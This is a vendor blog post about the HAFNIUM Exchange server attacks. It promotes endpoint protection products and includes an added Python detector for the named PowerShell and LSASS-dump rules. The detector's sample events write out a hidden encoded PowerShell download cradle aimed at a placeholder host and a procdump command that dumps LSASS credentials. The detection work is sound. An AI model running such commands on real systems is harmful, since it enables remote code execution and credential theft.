Early last week Microsoft identified that the state-sponsored threat actor HAFNIUM was exploiting vulnerabilities in on-premises Exchange servers to compromise email accounts. Within days, malicious actors beyond HAFNIUM began targeting these unpatched systems, installing additional malware to ensure long-term access to victim environments.
BlackBerry’s Threat Research Team has analyzed the cyber-attack chain and strongly urges customers to follow Microsoft’s advice and update on-premises systems immediately to reduce the risk to potentially affected systems. We also recommend customers download and enable the custom Win Procdump Lsass CredTheft Mitre rule.
BlackBerry also authored a custom rule to identify and mitigate the techniques used by the HAFNIUM group. The new rule is available for customers to download through MyAccount by accessing the HAFNIUM Malware Optics Rules Knowledge Base (KB) article (000075912).
The Good News? CylancePROTECT, CylanceOPTICS, and CylanceGUARD Stop These Attacks.
Our customers can feel confident that our AI-driven security products, as well as our Managed Detection & Response (MDR) solution, are all well-equipped to mitigate the risks posed by threat actors exploiting unpatched vulnerabilities.
- CylancePROTECT®, our endpoint protection solution, can help shield customers from the HAFNIUM attack. BlackBerry Protect’s PowerShell Script Control will stop commands associated with the exploit. Memory Protection will prevent the dumping of LSASS memory by terminating the tool used in the attack before the memory extraction completes.
- CylanceOPTICS®, our endpoint detection and response (EDR) solution, can also help mitigate the attack. BlackBerry recommends that the following official Optics rules be activated:
  - Powershell Download
  - Fileless Powershell Malware
  - Powershell Encoded Command
  - Hidden Powershell Execution
- CylanceGUARD® customers are proactively protected, and our 24/7 MDR solution customers receive:
  - Alerts monitored in real time
  - Corrective policies applied while discovering gaps in policy implementation
  - Prioritized threat hunting
  - The latest threat intelligence for fast-moving threats
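The rule names above describe detection heuristics that defenders can reproduce in their own telemetry pipeline. As an added example (not BlackBerry's code and not the logic of the Optics rules, which the post does not publish), the following Python applies those heuristics to constructed process-creation events: it decodes the base64/UTF-16LE payload of a PowerShell `-EncodedCommand`, looks for hidden-window and download-cradle switches, and flags a dump tool whose command line references LSASS. The rule names are reused only as labels, and the event fields and sample command lines are assumptions constructed for the demonstration.

```python
"""Added example: apply the PowerShell and LSASS-dump heuristics named in the
post to constructed process-creation events. Not BlackBerry's code."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Constructed process-creation record (shaped like a Sysmon Event ID 1
    Image/CommandLine pair); field names are an assumption, not real telemetry."""
    image: str
    command_line: str


# A -e / -en / -enc / -EncodedCommand switch followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# -w hidden / -WindowStyle Hidden: the console is suppressed from the user.
HIDDEN_FLAG = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
# Common download primitives used to fetch a second stage.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|net\.webclient)"
)
# Execution of text straight from memory, the "fileless" pattern.
FILELESS = re.compile(r"(?i)(?:\biex\b|invoke-expression)")
# Any reference to the LSASS process on a dump tool's command line.
LSASS_REF = re.compile(r"(?i)\blsass(?:\.exe)?\b")
DUMP_TOOLS = ("procdump", "procdump64")


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None.
    PowerShell encodes the script as base64 of UTF-16LE text, so a detector
    must decode it before any content matching is meaningful."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Return the list of rule labels an event triggers (empty when benign)."""
    hits = []
    image = event.image.lower().rsplit("\\", 1)[-1]
    cmd = event.command_line
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append("Powershell Encoded Command")
            # Drop the opaque blob and scan the decoded script alongside the
            # remaining switches, since the cradle usually lives inside it.
            cmd = ENCODED_FLAG.sub(" ", cmd) + " " + decoded
        if HIDDEN_FLAG.search(cmd):
            hits.append("Hidden Powershell Execution")
        if DOWNLOAD_CRADLE.search(cmd):
            hits.append("Powershell Download")
        if FILELESS.search(cmd) and DOWNLOAD_CRADLE.search(cmd):
            hits.append("Fileless Powershell Malware")
    stem = image.rsplit(".", 1)[0]
    if stem in DUMP_TOOLS and LSASS_REF.search(cmd):
        hits.append("Win Procdump Lsass CredTheft")
    return hits


def build_sample_events():
    """Constructed sample telemetry: one encoded download cradle, one LSASS
    dump attempt, and one benign scheduled script. None of this is real data."""
    script = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
    encoded = base64.b64encode(script.encode("utf-16le")).decode("ascii")
    return [
        ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     f"powershell.exe -NoP -W Hidden -Enc {encoded}"),
        ProcessEvent(r"C:\Tools\procdump64.exe",
                     r"procdump64.exe -accepteula -ma lsass.exe C:\Temp\l.dmp"),
        ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     r"powershell.exe -File C:\Scripts\nightly-backup.ps1"),
    ]


if __name__ == "__main__":
    for ev in build_sample_events():
        print(ev.command_line[:60], "->", evaluate(ev) or "no alert")
```

The decode step is the part worth copying: content rules that match only on the visible command line miss anything an operator tucks behind `-EncodedCommand`, which is why the post lists it as a rule in its own right.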
Finally, any customers who are concerned that they have been compromised should refer to the Indicators of Compromise section of the Microsoft document, HAFNIUM targeting Exchange Servers with 0-day exploits.
The BlackBerry Incident Response team can work with organizations of any size and across any vertical to evaluate and enhance their endpoint security posture and proactively maintain the security, integrity, and resilience of their network infrastructure. For emergency assistance, please email us at DLIR@blackberry.com, or use our handraiser form.
Learn more about the latest cybersecurity threats and threat actors in the BlackBerry 2021 Annual Threat Report.